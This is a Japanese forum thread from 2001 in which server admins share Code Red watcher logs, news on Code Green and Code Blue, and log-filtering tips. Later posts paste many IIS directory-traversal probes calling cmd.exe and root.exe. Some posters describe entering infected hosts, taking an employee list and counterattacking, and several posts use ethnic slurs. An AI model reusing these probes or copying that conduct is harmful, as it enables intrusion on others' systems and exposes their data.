[2001/09/04 3:30:55] CodeRed Type XXXXX from: 202.125.86.xxx /
[2001/09/04 4:15:23] CodeRed Type XXXXX from: 202.107.35.xx/
[2001/09/04 5:45:08] CodeRed Type XXXXX from: 202.130.13.xxx /
[2001/09/04 7:04:02] CodeRed Type XXXXX from: 202.119.46.xx / astronomy.nju.edu.cn
[2001/09/04 7:17:09] CodeRed Type XXXXX from: 202.43.87.xxx /
[2001/09/04 7:40:08] CodeRed Type XXXXX from: 202.21.4.xx /
[2001/09/04 7:43:44] CodeRed Type XXXXX from: 24.38.194.xxx / cc927782-c.etntwn1.nj.home.com

688 :ついでに・・・:01/09/07 12:53
>>687
なんで感染ホスト伏せ字にするの?

689 :名無しさん@お腹いっぱい。:01/09/07 14:10
晒すのが目的じゃないからじゃない?

690 :名無しさん@お腹いっぱい。:01/09/07 15:40
そういう意味じゃなくって晒すと法的に問題あるの?
ただの、感染者のプライバシーに対する配慮だけ?

691 :名無しさん@お腹いっぱい。:01/09/07 17:17
でもリモホの方は伏せてないから一部バレバレだと思うのは漏れだけ?

692 :名無しさん@お腹いっぱい。:01/09/07 20:10
http://headlines.yahoo.co.jp/hl?a=20010907-00050632-reu-int
中国で新たなウイルス「コード・ブルー」が出現
 [北京 7日 ロイター] 世界中で大きなの被害をもたらしたワーム型コンピュータウイルス「コード・レッド」に類似したウイルス「コード・ブルー」が、中国で出現した。
 中国のコンピューターのセキュリティ専門家は、既にウイルスの分析にかかっているという。
 コード・ブルーの被害規模については明らかになっていない。
 新華社によると、コード・ブルーは徐々にコンピューターに感染していき、結果的にシステムが破壊される。
 (ロイター)
[9月7日19時18分更新]

これって・・・。

693 :名無しさん@お腹いっぱい。:01/09/07 21:09
>>692
ガイシュツの変種に勝手な名前付けて騒いでる可能性大。

694 : :01/09/07 21:44
>692
コード・グリーンは??

・・どうでも良いけどいつの間にID表示無くなったん?

695 :694:01/09/07 22:09
http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=22381
↑記事有った。。コード・グリーン

696 :名無しさん@お腹いっぱい。:01/09/07 22:16
なんかおれのPCがCode RedVに感染したとメッセージでた。
Vって聞いたことないが・・・。だれかわかる?

697 :名無しさん@お腹いっぱい。:01/09/07 22:56
こうなったら日本はコードイエローで応戦しる!

698 :名無しさん@お腹いっぱい。:01/09/07 23:40
>>697 IISワーム戦隊コードファイブってか?(ワラ

699 :名無しさん:01/09/07 23:54
>696
CodeRedIIにしっかりやられてBackDoorできてるんでないの?親切な人が教えて
くれたんだろ。ちょっと恥ずいかもしれんぞ。

700 :え〜ん ◆EeeenOwI :01/09/08 01:10
>>699
笑ってシマタ

701 :名無しさん@お腹いっぱい。:01/09/08 01:20
コードイエローの好物はやっぱカレーなんすか?

702 :名無しさん@お腹いっぱい。:01/09/08 01:29
個人的にはピンクがいいと思われ。

703 :名無しさん@お腹いっぱい。:01/09/08 01:42
第十六話「偽グリーンに気を付けろ!」の巻

704 :名無しさん@お腹いっぱい。:01/09/08 03:35
コードスケルトン希望

705 :名無しさん@お腹いっぱい。:01/09/08 03:51

Redirect /default.ida http://www.broccoli.co.jp/

706 :名無しさん@お腹いっぱい。:01/09/08 08:04
>>705
頭わるい

707 :名無しさん@お腹いっぱい。:01/09/08 13:21
>>695
CodeGreenが来るとどんなアクセスログが残るんでしょう?
GGGGGGGGGGGGGGGGGGGGGGGGGGGG なんすかね?
自宅鯖のログには今のところ変った感じはないのだが...

708 :名無しさん@お腹いっぱい。:01/09/08 13:55
アンチCode Red、Code Greenあげ。

http://www.zdnet.co.jp/broadband/0109/07/codegreen.html

709 :名無しさん@お腹いっぱい。:01/09/08 14:03
ただし、Code Greenには時限消滅機能がついていないらしく、ある意味Code Redよりたちが悪いかも。

710 :名無しさん@お腹いっぱい。:01/09/08 16:31
>>709
Greenが全部にパッチ当て終われば自然消滅するだろう。

711 :え〜ん ◆EeeenOwI :01/09/08 18:02
>>708
この情報張ってくれてサンキュ
サイトに入れます。

712 :藁藁藁藁:01/09/08 20:04
>>708
>侵入したCode Greenは,MSサイトからパッ
>チをダウンロードしてあててくれる。

爆笑〜♪

713 :名無しさん@お腹いっぱい。:01/09/08 20:45
SecurityFocus.com に行ってもどこにあるんだかわからなかったよ……
メーリングリストなんだよね。

714 :695:01/09/08 21:40
>>713
直リン張ったページの中に下記の直リン有る
www.securityfocus.com/templates/archive.pike?mid=211428&part=.1&list=82
↑コードグリーン
www.securityfocus.com/templates/archive.pike?mid=211462&part=.1&list=82
↑CRcrean
両方ともzip直リン。
コードグリーンの方は、asmのソースとバイナリが拡張子txtにして入ってる。
READMEも付いてる。#use it at your own risk!って決り文句書いてあるけど(w
最初、某ウイルスサイトで見つけたのと同じだから大丈夫?でしょう。。

715 :714:01/09/08 21:53
但し、>>708の記事にも書いてある様に、両者ともソース公開してるから
騙りの亜種登場する可能性否定できないね。。。
解ってる奴がちょっといぢくれば、、、色々でしょ。どの様に使うかは、
your own riskだし。

716 :名無しさん@お腹いっぱい。:01/09/08 21:59
ownで済めばな・・・

717 :(´Д`;):01/09/08 22:24
ownで済まないのがワームの怖いところだね。。。

718 :708:01/09/08 23:02
>>710
「CRclean」は2001年11月に消えるけど、「Code Green」はパッチが当てられていようといまいと
世界中のシステムに侵入を繰り返し、結局Code Redのようにトラフィックの低下を招くのでは?
そこが不安。

719 :名無しさん@お腹いっぱい。:01/09/08 23:26
CRcleanくらいなら、どこか関係機関から犯罪にならない、もしくは
しないというお墨付きが欲しいな。。無理か。。

720 :名無しさん@お腹いっぱい。:01/09/08 23:51
最低でもSP1あててないとCodeRedパッチって使えないんだよね?
SP1/SP2を入れてないノーマルW2Kなマシンを検知した時はどうするんだろう?

どっちにしてもパケット吐きまくるとなるとしばらくはウザイことにかわりはないのかな 

721 :名無しさん@お腹いっぱい。:01/09/09 02:07
では、破壊した方が速いということで満場一致

722 :名無しさん@お腹いっぱい。:01/09/09 03:39
今日は1つも来なかった…ある意味恐い…
みんなはどうですか?

723 :名無しさん@お腹いっぱい:01/09/09 04:02
最近の状況連絡@CODERED WATCHER あげ
衰えず こーどれっどちゃん
[2001/09/08 23:32:32] CodeRed Type XXXXX from: 61.194.132.xxx / h1321xx.ap.plala.or.jp
[2001/09/09 0:07:47] CodeRed Type XXXXX from: 210.136.241.xxx / tokyo3-xx.pias.ne.jp
[2001/09/09 0:34:55] CodeRed Type XXXXX from: 210.83.133.xxx /
[2001/09/09 0:52:24] CodeRed Type XXXXX from: 210.64.51.xxx /
[2001/09/09 1:25:48] CodeRed Type XXXXX from: 210.136.196.xx / adslstm1-pxx.hi-ho.ne.jp
[2001/09/09 1:30:57] CodeRed Type XXXXX from: 210.205.238.xx/ s210-205-238-xx.thrunet.ne.kr
[2001/09/09 1:35:29] CodeRed Type XXXXX from: 61.194.132.xxx / h132xxx.ap.plala.or.jp
[2001/09/09 1:57:07] CodeRed Type XXXXX from: 61.194.132.xxx / h132xxx.ap.plala.or.jp
[2001/09/09 2:03:21] CodeRed Type XXXXX from: 210.136.218.xx /
[2001/09/09 2:17:43] CodeRed Type XXXXX from: 210.136.241.xxx/ tokyo3-xx.pias.ne.jp
[2001/09/09 2:31:17] CodeRed Type XXXXX from: 210.136.241.xxx / tokyo3-xx.pias.ne.jp
[2001/09/09 2:48:49] CodeRed Type XXXXX from: 210.78.138.xxx /
[2001/09/09 3:16:18] CodeRed Type XXXXX from: 210.127.33.x/ pdf4xx.dongbu.co.kr
[2001/09/09 3:21:22] CodeRed Type XXXXX from: 210.222.178.xx/
[2001/09/09 3:52:20] CodeRed Type XXXXX from: 210.98.146.xxx /

724 :名無しさん@お腹いっぱい。:01/09/09 04:55
>>722
未だに1時間に10個は来るなあ。今割り当てられてる IP は211.* 。
CodeGreenがCodeRedのペースで広がったら、数日で行き渡るよね。
……あ、今度はCodeGreenからのアクセスがバンバンくるのか。

725 :名無しさん@お腹いっぱい。:01/09/09 09:39
 ウチは5分に一個のペース。IPは210.*(殆どKrかCh、たまにJP)
 黒氷がチカチカするとウザイけど、完璧に来なくなるのもチョト
 さみしいカモ....

726 :名無しさん@お腹いっぱい。:01/09/09 10:48
Code Rcleanの方がいいですかね?

727 :名無しさん@お腹いっぱい。:01/09/09 11:31
CodeRed養殖したいんですけど?

728 :名無しさん@お腹いっぱい。:01/09/09 12:26
NPFは正常に起動中…たまたま運がよかったのかも。
でも、あるページの表示が遅いのは明らかにコードレッドのせいだよな。

729 : :01/09/09 16:22
下のチュンのサイトCodeRedを吐いてるぞ!
JAPAN SPA 芳香仕女 っていったい・・・
http://www.gomy.net/

730 :名無し:01/09/09 19:44
コードグリーンが開発されたわけで

http://www.zdnet.co.jp/broadband/0109/07/codegreen.html

731 :708:01/09/09 20:20
Code Blue発見あげ
http://www.zdnet.co.jp/news/0109/08/b_0907_06.html
具体的な事は何も分からないなあ・・。
今回もWin2000とWinNTのみに感染?

732 :名無しさん@お腹いっぱい。:01/09/09 23:26
Code Blue
http://www.newsbytes.com/news/01/169891.html
に詳しい事載ってたよ。

733 : :01/09/09 23:48
>732
なんか、レッドと喧嘩するみたいね(w

734 :名無しさん@お腹いっぱい。:01/09/10 14:07
apacheのエラーログがコードレッドだらけで読めないんで、
とりあえず、エラーだけでも出ないように、
default.idaに対する要求を、当たり障りのないようにゲイツの会社の頁にRedirectしたんだけど、
みんな、他に被害を最小限にくいとめるための、ほんとにちょっとした対策とかって
どんなのしてらっしゃいます?

735 :名無しさん@お腹いっぱい。:01/09/10 14:30
>>734
ガイシュツだと思うけど、リダイレクトはあんまり
意味無い。げいちゅに反省促すのはいいけど。

ログの振り分けは別スレにあったが。漏れはsedで
十分なんだが(w

736 :734:01/09/10 15:39
>>735
NOT Foundのエラー消すためだけのリダイレクトだったんで、
効果ないのは解ってたんですが、
だからって、知らない人のホストにリダイレクトするのも
気がひけたので(^^;;
ところで、ログの振り分けの事がかいてある別スレって
どこかおぼえてらっしゃいます?

737 :735:01/09/10 16:11
>>736
> NOT Foundのエラー消すためだけのリダイレクトだったんで、
勘違いスマソ

> ところで、ログの振り分けの事がかいてある別スレって
> どこかおぼえてらっしゃいます?
http://cocoa.2ch.net/test/read.cgi?bbs=unix&key=985980991
UNIX板だった。「Apache関連」201,222あたり。

---- コピペ開始 ----
> とりあえず XXXX 系のログだけでも隔離しよう。
> FreeBSD の場合だと。

> SetEnvIf Request_URI default\.ida code-red
> CustomLog /usr/local/apache/logs/access_log combined env=!code-red
> CustomLog /usr/local/apache/logs/codered_log common env=code-red
---- コピペ終了 ----

738 :734:01/09/10 16:15
>>735
さんきゅっす!!
さっそくやってみます!!

739 :名無しさん@お腹いっぱい。:01/09/10 17:00
新型ワーム『コード・ブルー』が中国企業を標的に
http://headlines.yahoo.co.jp/hl?a=20010910-00000001-wir-sci

740 :名無しさん@お腹いっぱい。:01/09/10 23:26
最近、ポートを塞いだCodeRed感染マシンが増えたような気がしませんか?
ひょっとしてFWかルータを使ってポートを塞ぎ、「これで安心」と思いこんでいるのでは。

741 : :01/09/10 23:37
>>740
何で解るの?
ひょっとして、アタックログ見るの密かな楽しみにしてない?

742 :名無しさん@お腹いっぱい。:01/09/11 00:22
>>740
同じことは感じますが、
塞いでるのかもしれないし、PROXYかもしれない。

743 :名無しさん@お腹いっぱい。:01/09/11 11:00
>>741
大体常連さんはわかります。穴を利用して警告を送るようなcgiをしかけているわけで
すが、警告が行くと大抵は回線を切断するようです。その後、また常連らしき人から
アタックが来るわけですが、調べてみると今度はポートへ接続できない。
しかしCodeRedからは攻撃が来る。という事は、根本的な対策は何も打たないままで
ポートを塞いでいるだけではないかと思われます。

744 :名無しさん@お腹いっぱい。:01/09/11 11:27
昨日からPort80にこんな感じでYBBユーザーからアクセスが来まくっているん
ですが、これはコードレッドなのでしょうか?

Date & Time     Action  Service     Host Name
01.9.11 11:18:48 AM Deny Web Sharing yahoobb224212***.bbtec.net
01.9.11 11:18:47 AM Deny Web Sharing yahoobb224212***.bbtec.net
01.9.11 11:06:29 AM Deny Web Sharing yahoobb224251***.bbtec.net
01.9.11 11:06:29 AM Deny Web Sharing yahoobb224251***.bbtec.net
01.9.11 11:06:28 AM Deny Web Sharing yahoobb224251***.bbtec.net
01.9.11 11:00:25 AM Deny Web Sharing yahoobb224251***.bbtec.net
01.9.11 11:00:24 AM Deny Web Sharing yahoobb224251***.bbtec.net
01.9.11 10:32:08 AM Deny Web Sharing yahoobb224212***.bbtec.net
01.9.11 10:32:07 AM Deny Web Sharing yahoobb224212***.bbtec.net

745 :名無しさん@お腹いっぱい。:01/09/11 11:31
窓の杜9/10メールより

02:【今日のお気に入り】Code Redワーム検知ソフト「赤虫捕まえ虫」v1.00
Code Red系のワームが侵入を試みるとサウンドが鳴り解析結果を表示する
ttp://www.cypress.ne.jp/mary/

746 :名無しさん@お腹いっぱい。:01/09/11 17:23
『コード・ブルー』のHTTPアクセスログが見たい。

747 :名無しさん@お腹いっぱい。:01/09/11 19:15
「第2のCode Red」となる可能性も――UNIXワーム「X.C」に警告
http://www.zdnet.co.jp/news/0109/11/e_worm.html

まぁ、IISにホトホト呆れて果てているUNIX屋さんですから。
当然、問題ないのでしょうケど。

748 :名無しさん@お腹いっぱい。:01/09/11 20:23
>>747
telnetポート開けてるホストなんてそんなに無いとおもうよ。
たぶん、第2のCode Redにはならないと思う。
最近のRedHatって、telnetポート初めから開いてたっけ?
私、xinetdごと閉じちゃったから、わかんないや。

749 :名無しさん:01/09/11 21:04
何かマスコミやNetの尻馬に乗って「MSなんか使ってるからだよ。うちは
Linux+Apacheだから全然大丈夫」なんてホザいてパッチ当ててない自称
パワーユーザーとかがやられそうな気がする。

750 :名無しさん@お腹いっぱい。 :01/09/11 21:21
>>748
一旦社内に持ち込まれると危ないかもしれない。
Internetにさらしている奴は少ないけどFirewallの内側では
開けている鯖って結構多いんじゃないかな?

751 :名無しさん@お腹いっぱい。:01/09/11 21:37
最近WebArenaで会社のホームページを作ってるんだけど
まだどこにもリンクされてないからアクセスログに載るのはCode Redのアタックだけ。
1日に100回以上来てる。おかげで毎日アクセスログを見る楽しみ(鬱
なんかこの手のワームが蔓延したらそれだけでネットワークの負荷が大きくなりすぎて
インターネットがパンクしちゃうんじゃないかな。

752 :名無しさん@お腹いっぱい。:01/09/11 22:22
>>747 の記事だと対象OS は Solaris,SGI IRIX,OpenBSD のようで
Linux は入ってないみたいだけど、逆になんでこの4つなのかな。
これらの telnetd ってみんな同じ、または同じところから派生してる
ってことかな。派生元が同じなら、もっとほかの Unix も影響しそう
なもんだけど。

753 :名無しさん@お腹いっぱい。:01/09/11 22:24
>>752
> なんでこの4つなのかな。
「なんでこの3つなのかな」のマチガイ(藁

754 :名無しさん@お腹いっぱい。:01/09/11 23:58
Linuxのtelnetd(0.17以前)にも、バッファオーバーフローの
問題が見つかったとこなのにね。
それとは、関係ないのかな。
どういうしくみなんだろ。
時期バージョンでは、それもついてくるって事かな?
っていうか、テルネット切れ。SSHつかえ。

755 :名無しさん@お腹いっぱい。 :01/09/12 01:05
>>753
数より被害の大きさを狙えばSolarisは外せないんじゃないかな。
IRIXとOpenBSDは同じ穴があったってことでは?
FreeBSDも一寸前に穴を塞いでいたから塞ぐ前のは危ないの
かも知れない。

756 :753:01/09/12 01:57
本来 Solaris狙いの worm で、他のはたまたま引っかかったって
ことね、なるほど。

しかしバッファオーバフローの穴っていつまで経ってもポコポコ
出てくるなぁ。C で書いてる限り不可避なのか…。

757 :名無しさん@お腹いっぱい。:01/09/13 04:03
で、CodeBlue は今流行ってるの?
実際のアタック報告はないのかな。

758 :名無しさん@お腹いっぱい。:01/09/13 09:15
>>757
まだ、俺も受けてないけど・・・・
確実に万円してるもよう
「Code Redと似た新型ワーム「Code Blue」が,中国とオーストラリアで感染を広げているようだ。」
http://www.zdnet.co.jp/news/0109/12/e_codeblue.html

759 :名無しさん@お腹いっぱい。:01/09/13 13:33
ねーねー。
CodeRedに感染してるホストに、FTPでAnonymousログインして、
ちらちら見て回ったら、それは犯罪になるの?

760 :test:01/09/13 14:08
759>>
Anonymousで”公開”しているFTPサーバーに入っても
 犯罪にはならないでしょう。
 Anonymous = だれでもアクセスOKヨ!

761 :759:01/09/13 15:10
>>760
レスさんきゅっ!
でも、なんか会社の社員名簿とか、あからさまに公開しちゃマズそうなもの
ばっかりだったよ?
韓国のとこだったけど。こあいから、すぐ閉じちった。
名簿はDLしちゃったけど・・(ワラ
CodeRedに感染すると、各サービスのアクセス制限とか全部はずされちゃうの?

762 :名無しさん@お腹いっぱい。:01/09/13 15:29
今さら新たにCodeRed送ってくる奴がいたから、ブ
ラウザでhttp://***.***.***.***/っていうふうに
アクセスしようとして、アドレス打ちまちがえたら
(SOHO向け?)ルータの設定画面が出てきた。

なんで設定画面を外に晒してんだ?
ケーブル剌す穴間違えたとか?

763 :名無しさん@お腹いっぱい。:01/09/13 17:38
>>743
うちにも「ポートを塞いでいるだけ」に見えるCodeRedが
来るようになった。うざいなぁ。

764 :名無しさん@お腹いっぱい。:01/09/13 23:20
>>761
そんな事はない。
パッチも当てられない管理者は、必要の無いタスクを落とす事も出来ない
とゆーだけでしょう。

765 :名無しさん@お腹いっぱい。:01/09/13 23:27
>>762
うちのルータにも外部から設定画面入れる機能がある.
もちろん,指定Sourceアドレス以外は蹴るようになってるんだが.

766 :名無しさん@お腹いっぱい。:01/09/14 06:47
>>762
遠隔設定が出来るルータにパスワード設定し忘れているだけと思われ

767 :名無しさん@お腹いっぱい。:01/09/14 22:25
http://info.nttls.co.jp/
ここのセミナー用端末らしきIPから大量に来るんですけどー。
やめてよね。NTTさん。

768 : :01/09/15 09:48
それにしてもぜんぜんおさまらんのだね・・
こんだけ時間も経って情報も広まってんのに

769 :名無しさん@お腹いっぱい。:01/09/15 11:07
ageついでに
CRcleanのバイナリはないのかな

770 :名無しさん@お腹いっぱい。:01/09/15 11:24
ウチは未だに一日平均260〜270レッド。
8月初頭のピーク時で500〜800レッドだった。

771 :名無しさん@お腹いっぱい。:01/09/15 11:35
反省汁ってどんな汁?

772 :え〜ん ◆EeeenOwI :01/09/15 20:41
ニュースを一つ見つけたので張っとく
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

773 :test:01/09/17 11:11
えーん氏、 さんくす!!

774 :名無しさん@お腹いっぱい。:01/09/17 14:23
アメリカに行ってきた。
テロで飛行機が飛ばなくなった。
なんとか帰国した。
おみやげはもちろん Mountain Dew CODE RED だだだだっ。

775 :名無しさん@お腹いっぱい。:01/09/17 14:49
>>774
美味い?

776 :774:01/09/17 18:34
赤蟲ワッショイと踊りながら攻撃をしかけたくなるような味です。

777 :名無しさん@お腹いっぱい。:01/09/17 19:45
http://www.iga-younet.co.jp/yybbs/yybbs.cgi

778 :名無しさん@お腹いっぱい。:01/09/18 04:09
台湾政府から来るんだけどー

779 :名無しさん@お腹いっぱい。:01/09/18 17:14
>>777
まだ気付いてないみたいね

780 :名無しさん@お腹いっぱい。:01/09/18 20:04
今、中国(?)からアタックがあったんでチラッっとアタック先のPC覗いてみたら
そのパソコンのアクセスログにこんなのあった。

2001-09-18 08:51:29 61.123.*.* - 61.182.*.* 80 HEAD /Warning!-You-may-be-infected-with-CodeRed! - 404 CodeRedCapture/1.0
やるねぇODNの人(w
これはCGIでやったのかな?

781 :名無しさんに接続中…:01/09/18 21:25
このチョンうざい!
code red吐きまくり!
顔写真やTELまで載ってるよ
http://210.110.71.140/

782 :名無しさん@お腹いっぱい。:01/09/18 22:40
さっきからこんなシグネチャのが来てるんですがCodeRedの変種?
いまんとこsrc-ipはuniqで5つぐらい。相手は全部IIS4す。

GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278 "-" "-"
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-"
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir H
TTP/1.0" 404 319 "-" "-"

783 :名無しさん@もう眠たい:01/09/18 22:49
>782
来てます来てます、韓国ばっかですけど。

せっかく /Scripts/root.exeでアクセスできる
CGIを用意して待ってたのに アクセスパターンが
変わってがっかりしました

784 :名無しさん@お腹いっぱい。:01/09/18 22:50
うちにも22:30から毎分きてる
ただ,782さんより試行がずっと多い

785 :782:01/09/18 22:53
782です。
乗っけたシグネチャは全部ではないので、皆さんの
トコに来てるのと同じとおもいます。
srcはuniqでもProbeは同じパターンなので新種のwarmっぽいですね

786 :名無しさん@お腹いっぱい。:01/09/18 22:57
うちにも22:34にまさぐりに来てます。
なんかごそごそまさぐってて気持ち悪いんですけど…
新種のworm?

787 :名無しさん@お腹いっぱい。:01/09/18 22:59
あぁ CodeRed自体の変種の可能性もあるのか。。

kazumu.as.wakwak.ne.jp と 61.147.112.72
>>782 と同じ感じに探ってたから、今反撃してんだけど
辞めた方が良いかな。

つか、kazumu.as.wakwak.ne.jp って何?

788 :782:01/09/18 23:00
一部載せとくのも何なので一部伏字で。
ちょっと前に出ていたCode Blue Warmってのとは違うのでしょうかね

--
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:55 +0900] "GET /scripts/root.ex
e?/c+dir HTTP/1.0" 404 280 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:55 +0900] "GET /MSADC/root.exe?
/c+dir HTTP/1.0" 404 278 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /c/winnt/system3
2/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /d/winnt/system3
2/cmd.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /scripts/..%255c
../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:56 +0900] "GET /_vti_bin/..%255
c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:57 +0900] "GET /_mem_bin/..%255
c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:57 +0900] "GET /msadc/..%255c..
/..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+di
r HTTP/1.0" 404 335 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:58 +0900] "GET /scripts/..%c1%1
c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:41:58 +0900] "GET /scripts/..%c0%2
f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%c0%a
f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%c1%9
c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:02 +0900] "GET /scripts/..%%35%
63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:03 +0900] "GET /scripts/..%%35c
../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:03 +0900] "GET /scripts/..%25%3
5%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
adslxxx2-xxxx.hi-ho.ne.jp - - [18/Sep/2001:22:42:06 +0900] "GET /scripts/..%252f
../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"

789 :787:01/09/18 23:02
もしかして kazumu@.as.wakwak.ne.jp がメアドだったりするのかな。藁

790 :ななし:01/09/18 23:03
はじめてきましたよ
これ

WWW - - [18/Sep/2001:22:53:20 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:21 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:24 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:25 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:26 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 218
WWW - - [18/Sep/2001:22:53:26 +0900] "GET /sc?/c+dir HTTP/1.1" 404 218
WWW - - [18/Sep/2001:22:51:59 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 257

791 :名無しさん@お腹いっぱい。:01/09/18 23:06
>782
うちにもいっぱい来てる!!
co.jpとne.jpが多いね。殆どがまだ、日本国内から。

792 :ななし:01/09/18 23:06
すごいなー不正アクセスされぱなしだ
どうなってんの?

793 :ななし:01/09/18 23:07
まじでやばそうよ!

794 :ななし:01/09/18 23:08
ニュース版でほうこくしたら?

795 :名無しさん@お腹いっぱい。:01/09/18 23:08
ちなみに動作内容はなんなの?

未だにCodeRedに感染する様な奴は二度とリブートさせんぜよ!
って感じの内容なら作成者褒めたげるんだけど。

796 :名無しさん@お腹いっぱい。:01/09/18 23:10
うーん、テスト用にさらしてたPCがやられちゃった。
至る所にreadme.emlが出来てた。
テキストエディタで見てみたら、どうやら開くと何かのMovieが開くようだ。
見てみたい…

797 :782:01/09/18 23:13
Code Blueだとすればコレかな
http://www.zdnet.co.jp/help/howto/security/v08/02.html
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html

798 :ななし:01/09/18 23:13
うちにも来てるんですけど噂のCode Blueなんですか?

61.151.230.** - - [18/Sep/2001:23:09:27 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 325
61.151.230.** - - [18/Sep/2001:23:09:28 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 325
61.151.230.** - - [18/Sep/2001:23:09:32 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325

799 :ななし:01/09/18 23:13
ほんとうだ新型がきだしたよ

800 :名無しさん@お腹いっぱい。:01/09/18 23:15
今日は明らかに多いですね。これが噂のCode Blueか?

801 :名無し:01/09/18 23:16
[Tue Sep 18 22:36:21 2001] [error] [client 61.77.94.***] File does not exist: scripts/root.exe

ずいぶん 来てます。

802 :名無しさん@お腹いっぱい。:01/09/18 23:18
あーあ、また無意味なログ肥大化だよ、実害ないけどさ・・
パッチ適用していないアホドモはどうして減らないのだ?

803 :782:01/09/18 23:20
>>802
激しく同意!!

804 :名無しさん@お腹いっぱい。:01/09/18 23:21
http://kazumu.as.wakwak.ne.jp/
FW通して開いたら大爆笑

いっぺん死んでこい

805 :仕様無しさん ◆NwLv.g/w :01/09/18 23:21
来まくってるよ...もう32個所から。 *sigh*

806 :名無しさん@お腹いっぱい。:01/09/18 23:21
まったく、やれやれって感じだ・・・

807 :786:01/09/18 23:28
CodeRedに感染してる厨房は今度の新型にも感染してるような…

ま、apacheだからどうでもいいけどさっ!

808 :ななし:01/09/18 23:30
203.***.***.*** からでした
やっとおさまったようです

809 :名無しさん@お腹いっぱい。:01/09/18 23:36
Win厨管理者、、まじで逝ってよしだから。

いや、前回でこりたんじゃないの>Win厨
勘弁してよ>Win厨

NTとか2000とか使うかよ?ちょっとはPCに興味あるんだろ?
だったらM$製品なんて使うなボケ。カス。まじでウセロ。

810 :782:01/09/18 23:41
未だ収束せず。
ログがお祭り状態っす (藁

おいコラ、NT屋!いいかげん何とかせい!

811 :これって??:01/09/18 23:42

ひょっとして、凄まじい連続アタックなのですか?
どうなんでしょう? 非常に気分悪いです。
アパッチのログなんですが、1時間ほどで軽く1000行越えますが。。。

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 269 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293

などなど続く…
てっきりわざとかと思ってたんですが、これってCode Blue??

812 :ななし:01/09/18 23:42
>809
すみません逝ってきます。
WIN2k+Apacheですけど、どんな穴があるかもや知れませんのでしばらくはサービス停止しておきます。

つーかM$、魔事務化(怒
不良品売りつけんな

813 :名無しさん@お腹いっぱい。:01/09/18 23:43
